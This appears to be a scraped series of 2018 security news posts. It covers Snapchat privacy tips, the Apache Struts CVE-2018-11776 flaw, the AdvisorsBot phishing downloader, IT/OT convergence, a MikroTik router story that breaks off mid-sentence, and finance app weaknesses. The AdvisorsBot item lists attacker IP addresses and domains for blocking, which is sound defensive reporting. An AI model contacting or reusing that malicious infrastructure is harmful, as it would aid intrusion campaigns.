  • Do not accept friend requests from people you don’t know, and stick to friends-only. For security measures, Snapchat has the option “friends-only” set by default, which means only those that follow you back can see your Snaps and vice versa.
  • Make your videos and stories posted to the “My Story” section are visible only for people you know or customize them from the Setting menu, but avoid making them available to prying eyes.
  • For more privacy, hide your profile from the “See me in quick add” section which can show your profile to random people who might want to add you. You can disable it from the Settings menu.
  • If you want to keep your Snapchat activity more private, don’t share screenshots or photos of your Snapcodes with others!
  • We keep saying this piece of advice until everyone understands its importance that applies to every online account or service used: Make sure you use only strong and unique passwords for Snapchat too. You don’t realize how easily malicious actors can hack them.

How do you secure your social media accounts?

All of these security and privacy tips may not be new to any of you, but we live in a world of oversharing on social media and it helps remind you how to stay safe on the most important and used networks: Facebook, Twitter, LinkedIn, Instagram or Snapchat.

Have you applied any of these security measures? Do you have others we should add? Let us know, we’d love to know your thoughts!

The post Here Are The Essential Security Tips To Stay Safe On Social Media appeared first on Heimdal Security Blog.

CVE-2018-11776 — The Latest Apache Struts Vulnerability

About a week ago, a security researcher disclosed a critical remote code execution vulnerability in the Apache Struts web application framework that could allow remote attackers to run malicious code on the affected servers. The vulnerability (CVE-2018-11776) affects all supported versions of Struts 2 and was patched by the Apache Software Foundation on Aug. 22. Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. They should do so as soon as possible, given that bad actors are already working on exploits.

More critical than the Equifax vulnerability

“On the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,” Man Yue Mo, the researcher who uncovered the flaw, told the media, referring to CVE-2017-9805. CVE-2017-9805 was announced the same day (September 7, 2017) that Equifax announced the massive data breach via CVE-2017-5638, which led to the lifting of personal details of over 148 million consumers.

Struts, an open source framework for developing web applications, is widely used by enterprises worldwide, including Fortune 100 companies like Lockheed Martin and Virgin Atlantic, as well as the U.S. Internal Revenue Service.

In 2017, the Equifax credit reporting agency used Struts in an online portal, and because Equifax did not identify and patch a vulnerable version of Struts, attackers were able to capture personal consumer information such as names, Social Security numbers, birth dates, and addresses of over 148 million U.S. consumers, nearly 700,000 U.K. residents, and more than 19,000 Canadian customers.

I spoke to Black Duck by Synopsys technical evangelist Tim Mackey about the newly discovered Struts vulnerability. “Modern software is increasingly complex, and identifying how data passes through it should be a priority for all software development teams,” Tim noted. “To give you some background, developers commonly use libraries of code, or development paradigms which have proven efficient, when creating new applications or features. This attribute is a positive when the library or paradigm is of high quality, but when a security defect is uncovered, this same attribute often leads to a pattern of security issues.

“In the case of CVE-2018-11776,” Tim continued, “the root cause was a lack of input validation on the URL passed to the Struts framework. In both 2016 and 2017, the Apache Struts community disclosed a series of remote code execution vulnerabilities. These vulnerabilities all related to the improper handling of unvalidated data. However, unlike CVE-2018-11776, the prior vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors.

“CVE-2018-11776, on the other hand, operates at a far deeper level within the code, which in turns requires a deeper understanding of not only the Struts code itself but the various libraries used by Struts. It is this level of understanding which is of greatest concern—and this concern relates to any library framework. Validating the input to a function requires a clear definition of what is acceptable. It equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it’s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued, as it’s unrealistic to assume that all patches are free from behavioral changes.”

Shortly after the Apache Software Foundation released its patch, a proof-of-concept exploit of the vulnerability was posted on GitHub. The PoC included a Python script that allows for easy exploitation. The firm that discovered the PoC, threat intelligence company Recorded Future, also said that it has spotted chatter on underground forums revolving around the flaw’s exploitation. Companies not wanting to become the next Equifax should immediately identify what version of Apache Struts they have in use and where, and apply the patch as needed.

About the author: Fred Bals is a corporate storyteller for Black Duck by Synopsys, focused on providing insights that help security, risk, legal, DevOps, and M&A teams better understand open source security and license risks. Fred is a researcher for the Synopsys Center for Open Source Research & Innovation, and co-author of the 2018 Open Source and Risk Analysis report. 

Copyright 2010 Respective Author at Infosec Island

Malicious Emails Use New AdvisorsBot to Compromise Telecommunications and Hospitality Companies

Researchers discovered a new downloader, dubbed AdvisorsBot, as part of an attack campaign that uses malicious emails to target companies in the telecommunications and hospitality industries.

First observed by Proofpoint in May 2018, AdvisorsBot is a previously undocumented downloader that’s now appearing as part of a phishing campaign crafted specifically to compromise telecommunications companies, restaurants and hotels. According to Proofpoint, the campaign is likely the work of a threat actor known as TA555, who uses this malware as a first-stage payload.

While AdvisorsBot is modular and contains command-and-control (C&C) capabilities, Proofpoint has only observed the malware actively sending fingerprint module data — which it uses to identify potential targets — back to the C&C. Over the past four months, three separate AdvisorsBot variations have been used in attack campaigns; the latest iteration included an entirely PowerShell version of the malware.

Malicious Emails Highly Targeted to Specific Industries

Key to the success of this malware campaign is the use of malicious emails designed to elicit a response from targets. Restaurants receive messages about food poisoning with attached doctors’ reports, for example, while hotels are targeted with emails about double service charges with attached credit statements. Telecommunications companies, meanwhile, receive job application emails with resumes or CV attachments.

If users open these malicious attachments and enable Microsoft Word macros, AdvisorsBot downloads, fingerprints the system for potential interest to attackers and then sends this data to the C&C server. The result is an increased risk of phishing success with emails that go the extra mile to appear legitimate.

Another concern around AdvisorsBot is ongoing development. As noted by Proofpoint, the malware is “under active development and we have also further observed another version of the malware completely rewritten in PowerShell and .NET.” In May and June, for example, the malicious documents contained PowerShell scripts to download AdvisorsBot. On Aug. 8, the macro was modified to include a PowerShell command that downloaded another PowerShell script before downloading the malware.

In addition, AdvisorsBot uses junk code and Windows application programming interface (API) function hashing to evade security analysis. This continual evolution means that successfully countering one version of AdvisorsBot may not ensure defense against the next.

How to Avoid AdvisorsBot

According to the IBM X-Force Exchange advisory for this threat, security teams should block specific IPs (162.244.32.148 and 185.180.198.56) associated with AdvisorsBot, along with URLs such as investments-advisors.bid, interactive-investments.bid and real-estate-advisors.win.

IBM experts also recommend adopting a layered approach to email security that includes spam control and monitoring, external mail scanning, perimeter protection, and training for end users to avoid common phishing attack techniques — such as the highly targeted malicious emails that precede AdvisorsBot infections.

Source: Proofpoint

The post Malicious Emails Use New AdvisorsBot to Compromise Telecommunications and Hospitality Companies appeared first on Security Intelligence.

Securing the Convergence of IT with OT

The Industrial Internet of Things (IIoT) is the leading edge of the convergence of Operational Technology (OT) with IT. This convergence begins with network connectivity but requires enhancements in operational procedures, technology, and training as well.

Beginning with the network, IT and OT use different protocols. Within the OT world, vendors have created many proprietary protocols over the past 50 years: MODBUS dates from 1969; ABB alone has over 20 protocols. IIoT vendors offer gateways to simplify and transform information before it moves to IT’s cloud for aggregation and processing. The volume of data can be huge, so IIoT gateways use compression, aggregation, and exception reporting to minimize network traffic. Gateways are Edge processors.

Operational procedures differ between IT and OT environments. The guiding principles of OT networks are two: safety, and service reliability. However, the IT information security principles are data availability, data integrity, and data confidentiality. These principles are orthogonal: they do not overlap. From an IT perspective, and industrial process is not “information” so falls out of scope for information security.

IT and OT processes could converge as they each evolve. DevOps breaks down the barriers between development and operations for more rapid deployment of new function without compromising controls governing software quality. Figure 1 shows a converged DevOps process:

 

Figure 1: Converged DevOps Process

In the OT realm, enhancements to Process Hazard Analysis are driving the evolution of Cyber Process Hazard Analysis, as shown in Figure 2.

Figure 2: Cyber Process Hazard Analysis (Cyber PHA)

The OT evolution shows two processes: on the left in blue, the ongoing asset security analysis, which influences the OT Program and Governance Model in step 5 on the right. As new threats come to light, engineers update the model which flows into a new, more secure, steady state for the environment.

OT technology is evolving as core technologies offer greater processing power, storage capacity, battery life, and network connectivity. Early OT protocols had no authentication or encryption, and could not accept over-the-air software and firmware updates securely. Newer processor chips can support these requirements, but the IIoT vendors must build these capabilities, requiring larger code bases for development and some mechanism to issue patches during operations. IIoT vendors do not have experience running bug bounty programs. They will need some way to get feedback from their customers and researchers to fix problems before they get out of hand.

Training means more than ad hoc learning as the opportunity presents itself. Information security skills are scares and growing more so. Organizations need to provide additional skills to their existing staff, and may need to rely on outsourced support to bridge the gap while those new skills come on-line. But simply handing off responsibility to a third party will not eliminate risk: the organization itself will have to enhance its operational procedures to handle patch/fix requirements in time.

At Trend Micro, we understand this complexity, so we address it from different angles. Securing the connected world is one of our highest priorities.  So far this year, we have launched a series of programs and partnerships to help IIoT manufacturers and their marketplaces. The Zero-Day Initiative (ZDI) includes Industrial Control Systems (ICT) defect reports. ZDI processed 202 SCADA HCI defects in the first half of 2018. Deep Security already has over 500 filters/virtual patches for OT protocols traveling over IP. Trend Micro offers guidance on deploying information security tools in the development cycle so the CD/CI process does not experience a disruption as security contexts change with production deployment. The IoT SDK helps IoT device manufacturers build core information security functions into devices during development, as with Panasonic’s In-Vehicle Infotainment (IVI) systems. By offering IoT vendors access to ZDI, Trend Micro extends its expertise in managing bug bounty programs to new entrants from outside the conventional IT realm. Partnerships with IIoT vendors such as Moxa extend 30 years of Trend’s information security expertise to a broad range of industrial control platforms. Trend Micro’s offering for telecommunications brings work-hardened network and server security to carriers for secure, reliable communications. Contact Trend Micro for more information about the threat landscape and available solutions.

For more information, please click here.

What do you think? Let me know by commenting below, or reach me @WilliamMalikTM .

The post Securing the Convergence of IT with OT appeared first on .

Thousands of MikroTik Routers Hacked to Eavesdrop On Network Traffic

Last month we reported about a widespread crypto-mining malware campaign that hijacked over 200,000 MikroTik routers using a previously disclosed vulnerability revealed in the CIA Vault 7 leaks. Now Chinese security researchers at Qihoo 360 Netlab have discovered that out of 370,000 potentially vulnerable MikroTik routers, more than 7,500 devices have been compromised to enable Socks4 proxy

How Secure Are Popular Finance Apps on Google Play?

Whether it’s paying bills, transferring money, reviewing account balances or even trading stocks, consumers increasingly rely on mobile banking apps from their device, whether it’s a mobile phone or tablet or the smart watch on their wrist. The growth and popularity of fintech or financial technology is spreading rapidly.

A recent market research study found consumer mobile banking usage increased by almost 50 percent within the past year. According to Statista, in 2018 the transactional value of the fintech market in the United States is more than $1 million dollars.   

Mobile banking is undeniably convenient, but are the apps that handle our money 100% secure?

The unfortunate reality is that almost all apps are susceptible to hacking attacks and when damages occur in the financial services industry, the results can severely affect not only the targeted institution, but unlucky consumers as well.

To understand the current security state of fintech apps, researchers at SEWORKS downloaded and analyzed the top 20 free Android finance apps on Google Play in popular categories such as mobile banking, payments, investments, budgeting, trading, credit and expense tracking and other financial categories.

What we discovered, unfortunately, was not unexpected.

Analyzing top Android mobile banking apps

SEWORKS researchers employed both dynamic and static testing methods to conduct more detailed analysis on app vulnerabilities even when they run.

All of the finance apps had properly secured native libraries and data encryption, which is a positive sign that companies care about adding security measures and protecting the data and users.

However, our analysis uncovered five critical and medium vulnerabilities in the free Android finance apps on Google Play:

  • 100%: File input/output or I/O. Level – critical. Data transfer to or from the application file system can serve as an entry attack point, such as when financial statements or tax forms are downloaded or budgets updated. Malicious code injected into the app can allow malicious attackers access to resources such as users’ account numbers, passwords or routing numbers. Hacking attacks via file I/O can be executed internally and/or by using network behaviors to activate a backdoor with a connected network.
  • 100%: Network behaviors. Level – medium.Hackers can potentially exploit vulnerabilities within the server-client communication, such as when users access account balances, transfer funds, or perform other activities. For example, a man-in-the-middle (MITM) attack, where the attacker secretly relays and possibly alters the communication, can occur if an app’s authentication protocols and certification pinning is incorrect.
  • 100%: Code tampering. Level – medium.Listed as one of the Open Web Application Security Project (OWASP)Mobile Security Project’s Top 10 Risks, it is considered one of the most common app vulnerabilities and one of the easiest to manipulate. By changing or replacing code, an application can be exploited for various types of attacks, such as inserting malware or phishing.
  • 30%: Secure Sockets Layer (SSL).Level – critical. Vulnerabilities related to a broken or a link between a server and client that is not properly established and encrypted could leave sensitive financial data vulnerable.
  • 5%: DEX file exposure. Level – critical. A relatively small numberof the apps had vulnerabilities related to the Dalvik Executable file (.DEX) containing the app’s Java bytecode. Code decompiled to expose the original source code could lead to malicious hacking attacks, such as piracy and malware injection.

The result of our analysis of mobile banking apps is similar to what we’ve uncovered in the m-commerce and fitness markets – all apps are subject to hacking attacks.

All of the finance apps we studied had at least one critical vulnerability, as well as medium and low security risks. We recommend adding security starting from the app development phase and testing often to ensure the app security status is up to date. It is also important to encourage the infosec team to maintain security protocols.  Certainly, apps that handle our finances must have a comprehensive level of security.

About the author: Min-Pyo Hong has advised corporations, NGOs, and governments on digital security issues for over 20 years, and led a team of five-time finalists at Defcon. Hong is currently founder and CEO of Seworks, a San Francisco-based developer of advanced security solutions for the mobile era.

Copyright 2010 Respective Author at Infosec Island